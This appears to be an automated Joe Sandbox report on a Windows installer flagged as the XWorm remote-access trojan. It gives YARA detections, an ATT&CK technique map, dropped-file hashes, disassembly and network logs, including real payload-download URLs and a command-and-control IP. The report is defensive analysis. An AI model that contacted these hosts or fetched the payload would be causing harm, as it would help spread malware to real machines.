Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\Desktop\998_popxinv_Installer.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 998_popxinv_Installer.exe PID: 1564, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 0.2.998_popxinv_Installer.exe.5f90000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.998_popxinv_Installer.exe.5f90000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.3872605515.0000000005F90000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 998_popxinv_Installer.exe PID: 1564, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Native API	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	141 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	11 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	131 Virtualization/Sandbox Evasion	Security Account Manager	131 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	34 System Information Discovery	SSH	Keylogging	12 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
998_popxinv_Installer.exe	21%	ReversingLabs
998_popxinv_Installer.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://guanlix.cn:881/998.ccpS	0%	Avira URL Cloud	safe
http://guanlix.cn:881/998.ccp	0%	Avira URL Cloud	safe
134.122.174.169	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
guanlix.cn	91.208.240.157	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/998.ccp	false	Avira URL Cloud: safe	unknown
134.122.174.169	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://guanlix.cn:881/998.ccpS	998_popxinv_Installer.exe, 00000000.00000002.3869480227.00000000013DF000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	998_popxinv_Installer.exe, 00000000.00000002.3871104262.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.208.240.157	guanlix.cn	unknown		139659	LUCID-AS-APLUCIDACLOUDLIMITEDHK	false
134.122.174.169	unknown	United States		64050	BCPL-SGBGPNETGlobalASNSG	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466320
Start date and time:	2024-07-02 19:27:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 43s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	998_popxinv_Installer.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@1/2@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 33
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: 998_popxinv_Installer.exe

Simulations

Behavior and APIs

Time	Type	Description
13:28:33	API Interceptor	8505197x Sleep call for process: 998_popxinv_Installer.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.208.240.157	139_p.exe	Get hash	malicious	Unknown	Browse	guanlix.cn:881/139.ccp
	156_p.exe	Get hash	malicious	Unknown	Browse	guanlix.cn:881/156.ccp
	103__Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/103.ccp
	33__Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/330.ccp
	31__Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/103.ccp
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/31.ccp
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	guanlix.cn:881/33.ccp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
guanlix.cn	139_p.exe	Get hash	malicious	Unknown	Browse	91.208.240.157
	156_p.exe	Get hash	malicious	Unknown	Browse	91.208.240.157
	103__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BCPL-SGBGPNETGlobalASNSG	h8N9qpyRAPaiitu.exe	Get hash	malicious	FormBook	Browse	14.128.41.167
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	118.107.53.143
	Request for Quotation - e092876.exe	Get hash	malicious	FormBook	Browse	118.107.56.38
	Dtjgu2gHw0.elf	Get hash	malicious	Mirai	Browse	137.220.211.71
	cEEsFMSdw8.elf	Get hash	malicious	Mirai	Browse	118.107.53.144
	PTT requested quotation.exe	Get hash	malicious	FormBook	Browse	118.107.56.40
	GOoY5QBqvC.elf	Get hash	malicious	Mirai, Moobot	Browse	118.107.53.127
	https://whastappg.top/	Get hash	malicious	Unknown	Browse	216.224.126.59
	666.exe	Get hash	malicious	Unknown	Browse	143.92.49.135
	666.exe	Get hash	malicious	Unknown	Browse	143.92.49.135
LUCID-AS-APLUCIDACLOUDLIMITEDHK	139_p.exe	Get hash	malicious	Unknown	Browse	91.208.240.157
	156_p.exe	Get hash	malicious	Unknown	Browse	91.208.240.157
	103__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31__Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	103-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	31-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	33-o_Installer.exe	Get hash	malicious	XWorm	Browse	91.208.240.157
	https://telegram-wv.icu/	Get hash	malicious	Unknown	Browse	103.143.81.212
	#U6ce1#U6ce1#U7801#U5ba2#U6237#U7aef.exe	Get hash	malicious	Unknown	Browse	45.136.13.176

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\Public\Downloads\ind.jpg

Download File

Process:	C:\Users\user\Desktop\998_popxinv_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.603614008435648
Encrypted:	false
SSDEEP:	1536:ps4vqW9lScGjh+6BkfHP5REB+I2/dcx+WN1rvTSFsbWXM6eKXBwLsy1ETqfvu+PE:K4vqXf1Nkfv5a+I2/CwWj2OUMRKXBwLC
MD5:	66F0DEE667D7F05D72AA6D3C827B5483
SHA1:	38140E7D7F0157DCAFEEB5DBDD79A820BADDA3AD
SHA-256:	CED79FF0D64E20C02C5D7FDF0918013BA9687361FF1651317B3E49FCC30FF4FE
SHA-512:	B18E2A48B565328BDFC5D02F8F6B96DE0A1DF5253A877F5F9411CAAC9AD1AD9C5142917816556C0D0E30DE2BBA62AABF100B332CCBDA2DFBA53590396B85AE95
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\Public\Downloads\ind.jpg, Author: unknown
Reputation:	low
Preview:	.......G7E..`C..wo...u..:....{..,...$...."....C...>b....1J....j.~25.p.....X..Bh.RZB0..Gau.NSh...4r.....[...l}h.qKH..... a.u...a..T/L2b...Q....S.Y7...\v..I.(s..n..H/.l.La..4t.O...P#m.s...VX...iZ....f#7.9...q..1@v=M............\|......k.s.1.[...5..V......)..5..%...e\..\|..$..^.P.....t\|(..)....K.Wl.<.B*'nFn.B..........................................................................................................................................................................................................................................................\|.....qg....9XV..J..6....C.}F....W...z..~.....9=,...4.-g.'<udT.F....0 ...T...?F/:....+.v.l..$.tN.?......3.....~=0...H.m_--......}O.f.....}.....r.\|....,......0.DP....].~....U..'.9...9...=...a.p9.L...Q.>/.1.:.&...&....Xj...;.B......t.L...t.BV?Q.....=..^.l.l..7..%~Y.Ww5.V...J..N7.......1=...`..A..a]..%....M=..9.......}!......{..Y....1.kr...-...c.....mao.a#....l.w.`B..[@....U....YH:...^[K5k.m.....x.t..R..0p..@D...N

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp

Download File

Process:	C:\Users\user\Desktop\998_popxinv_Installer.exe
File Type:	data
Category:	dropped
Size (bytes):	71938
Entropy (8bit):	7.603614008435648
Encrypted:	false
SSDEEP:	1536:ps4vqW9lScGjh+6BkfHP5REB+I2/dcx+WN1rvTSFsbWXM6eKXBwLsy1ETqfvu+PE:K4vqXf1Nkfv5a+I2/CwWj2OUMRKXBwLC
MD5:	66F0DEE667D7F05D72AA6D3C827B5483
SHA1:	38140E7D7F0157DCAFEEB5DBDD79A820BADDA3AD
SHA-256:	CED79FF0D64E20C02C5D7FDF0918013BA9687361FF1651317B3E49FCC30FF4FE
SHA-512:	B18E2A48B565328BDFC5D02F8F6B96DE0A1DF5253A877F5F9411CAAC9AD1AD9C5142917816556C0D0E30DE2BBA62AABF100B332CCBDA2DFBA53590396B85AE95
Malicious:	false
Yara Hits:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\998[1].ccp, Author: unknown
Reputation:	low
Preview:	.......G7E..`C..wo...u..:....{..,...$...."....C...>b....1J....j.~25.p.....X..Bh.RZB0..Gau.NSh...4r.....[...l}h.qKH..... a.u...a..T/L2b...Q....S.Y7...\v..I.(s..n..H/.l.La..4t.O...P#m.s...VX...iZ....f#7.9...q..1@v=M............\|......k.s.1.[...5..V......)..5..%...e\..\|..$..^.P.....t\|(..)....K.Wl.<.B*'nFn.B..........................................................................................................................................................................................................................................................\|.....qg....9XV..J..6....C.}F....W...z..~.....9=,...4.-g.'<udT.F....0 ...T...?F/:....+.v.l..$.tN.?......3.....~=0...H.m_--......}O.f.....}.....r.\|....,......0.DP....].~....U..'.9...9...=...a.p9.L...Q.>/.1.:.&...&....Xj...;.B......t.L...t.BV?Q.....=..^.l.l..7..%~Y.Ww5.V...J..N7.......1=...`..A..a]..%....M=..9.......}!......{..Y....1.kr...-...c.....mao.a#....l.w.`B..[@....U....YH:...^[K5k.m.....x.t..R..0p..@D...N

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.938758047679234
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	998_popxinv_Installer.exe
File size:	249'344 bytes
MD5:	a8dc1e962f313cd278b0e648a6674d91
SHA1:	dd55bccfc5c30aa9a608b6c6fd10dd392cec82ad
SHA256:	1bc92d0988234ee9f52b96fd7ecd8d0b4159d69480581e5f46b2f29ab0f77684
SHA512:	5a6eb3da99273607208131cf599b7a11c5d6130e90a1e21e4b9b0718bdb9c90d392c19ecb99e8fc07ad15c8ad8458efd9a5481031131f729364040a7a442f85f
SSDEEP:	3072:Ue0P41iYUwihfpRBCaYXrD5sxTQp+m7QNae4ZQeAnuTCt2xbzmyoaq6rcYsc8kOt:784UwwRY7aTQBQN/njZ2xGp
TLSH:	32346B92F6C0D4B6D81711B5D83ADEB2126BBD798974010B36A5372F5EB33831936E0B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A.q>...m...m...mj..m...mj..m...m...m...m...m_..mj..m1..mj..m...mj..m...mRich...m........PE..L....Z.f.................v...T.....

File Icon


Icon Hash:	20246c0c56e20926

Static PE Info

General

Entrypoint:	0x405b41
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x66835A95 [Tue Jul 2 01:40:37 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b47c746b58dc722dcec07246158fda2

Entrypoint Preview

Instruction
call 00007F434508AB85h
jmp 00007F43450835EEh
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
test eax, eax
je 00007F4345083774h
sub eax, 08h
cmp dword ptr [eax], 0000DDDDh
jne 00007F4345083769h
push eax
call 00007F434508204Fh
pop ecx
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
mov eax, dword ptr [ebp+08h]
push esi
mov esi, ecx
mov byte ptr [esi+0Ch], 00000000h
test eax, eax
jne 00007F43450837C5h
call 00007F434508737Eh
mov dword ptr [esi+08h], eax
mov ecx, dword ptr [eax+6Ch]
mov dword ptr [esi], ecx
mov ecx, dword ptr [eax+68h]
mov dword ptr [esi+04h], ecx
mov ecx, dword ptr [esi]
cmp ecx, dword ptr [004201F8h]
je 00007F4345083774h
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F4345083769h
call 00007F434508B55Fh
mov dword ptr [esi], eax
mov eax, dword ptr [esi+04h]
cmp eax, dword ptr [0041FEB8h]
je 00007F4345083778h
mov eax, dword ptr [esi+08h]
mov ecx, dword ptr [0041FFB0h]
test dword ptr [eax+70h], ecx
jne 00007F434508376Ah
call 00007F434508ADBEh
mov dword ptr [esi+04h], eax
mov eax, dword ptr [esi+08h]
test byte ptr [eax+70h], 00000002h
jne 00007F4345083776h
or dword ptr [eax+70h], 02h
mov byte ptr [esi+0Ch], 00000001h
jmp 00007F434508376Ch
mov ecx, dword ptr [eax]
mov dword ptr [esi], ecx
mov eax, dword ptr [eax+04h]
mov dword ptr [esi+04h], eax
mov eax, esi
pop esi
pop ebp
retn 0004h
mov edi, edi
push ebp
mov ebp, esp
sub esp, 10h
mov eax, dword ptr [0041F920h]
xor eax, ebp
mov dword ptr [ebp-04h], eax
mov edx, dword ptr [ebp+18h]
push ebx

Rich Headers

Programming Language:

[ASM] VS2010 build 30319
[ C ] VS2010 build 30319
[IMP] VS2008 SP1 build 30729
[C++] VS2010 build 30319
[RES] VS2010 build 30319
[LNK] VS2010 build 30319

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x1d96c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23000	0x1c748	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x40000	0x138c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1c378	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x19000	0x150	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x17548	0x17600	11f66f6816777e46b10e535a4423e055	False	0.5846632687165776	data	6.6444729085072565	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x19000	0x50f0	0x5200	97091f345fb00fe6f4b21106ff8a4e31	False	0.3602801067073171	data	4.931773399760593	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x1f000	0x37c4	0x1a00	45f752e15a14fca1b3ff2706b42091af	False	0.3167067307692308	data	3.8749828218454043	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x23000	0x1c748	0x1c800	13c7e8b4f8049f0b57e98c87b62e9647	False	0.2745768229166667	data	4.800930470827677	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x40000	0x1e2e	0x2000	74110a466e5dcc00e19c2f5fa7cce65e	False	0.485595703125	data	4.814924868127027	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x233a0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	Chinese	China	0.2554878048780488
RT_ICON	0x23a08	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	Chinese	China	0.3602150537634409
RT_ICON	0x23cf0	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	Chinese	China	0.39344262295081966
RT_ICON	0x23ed8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	Chinese	China	0.4358108108108108
RT_ICON	0x24000	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Chinese	China	0.4986673773987207
RT_ICON	0x24ea8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Chinese	China	0.5888989169675091
RT_ICON	0x25750	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Chinese	China	0.548963133640553
RT_ICON	0x25e18	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Chinese	China	0.40534682080924855
RT_ICON	0x26380	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	Chinese	China	0.18236129184904767
RT_ICON	0x36ba8	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	Chinese	China	0.3425838450637695
RT_ICON	0x3add0	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Chinese	China	0.3924273858921162
RT_ICON	0x3d378	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Chinese	China	0.49953095684803
RT_ICON	0x3e420	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Chinese	China	0.580327868852459
RT_ICON	0x3eda8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Chinese	China	0.6906028368794326
RT_GROUP_ICON	0x3f210	0xca	data	Chinese	China	0.6089108910891089
RT_VERSION	0x3f2dc	0x304	data	Chinese	China	0.43134715025906734
RT_MANIFEST	0x3f5e0	0x165	ASCII text, with CRLF line terminators	English	United States	0.5434173669467787

Imports

DLL

Import

KERNEL32.dll

CloseHandle, ReadFile, VirtualAlloc, GetFileSize, CreateFileA, Sleep, GetTickCount64, VirtualFree, SetEndOfFile, CreateFileW, SetStdHandle, WriteConsoleW, LoadLibraryW, IsValidLocale, InterlockedIncrement, InterlockedDecrement, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, EncodePointer, DecodePointer, GetSystemTimeAsFileTime, GetLastError, HeapFree, RaiseException, RtlUnwind, GetCommandLineA, HeapSetInformation, GetStartupInfoW, WideCharToMultiByte, LCMapStringW, MultiByteToWideChar, GetCPInfo, HeapAlloc, IsProcessorFeaturePresent, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetModuleHandleW, SetLastError, GetCurrentThreadId, GetProcAddress, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, GetCurrentProcess, HeapCreate, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, ExitProcess, WriteFile, GetConsoleCP, GetConsoleMode, FlushFileBuffers, SetFilePointer, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetACP, GetOEMCP, IsValidCodePage, GetStringTypeW, GetLocaleInfoW, HeapReAlloc, HeapSize, GetUserDefaultLCID, GetLocaleInfoA, EnumSystemLocalesA, GetProcessHeap

WININET.dll

InternetCloseHandle, InternetReadFile, InternetOpenUrlA, InternetOpenA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
07/02/24-19:31:18.778371	TCP	2853193	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49749	7000	192.168.2.8	134.122.174.169
07/02/24-19:29:42.015000	TCP	2855924	ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound	49729	7000	192.168.2.8	134.122.174.169

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 2, 2024 19:28:28.897821903 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:28.903358936 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:28.903513908 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:28.903692007 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:28.909557104 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858350039 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858380079 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858392000 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858403921 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858414888 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858428001 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858462095 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:29.858515978 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:29.858515978 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858529091 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858540058 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858551979 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.858560085 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:29.858584881 CEST	49704	881	192.168.2.8	91.208.240.157
Jul 2, 2024 19:28:29.863317966 CEST	881	49704	91.208.240.157	192.168.2.8
Jul 2, 2024 19:28:29.863374949 CEST	881	49704	91.208.240.157	192.168.2.8
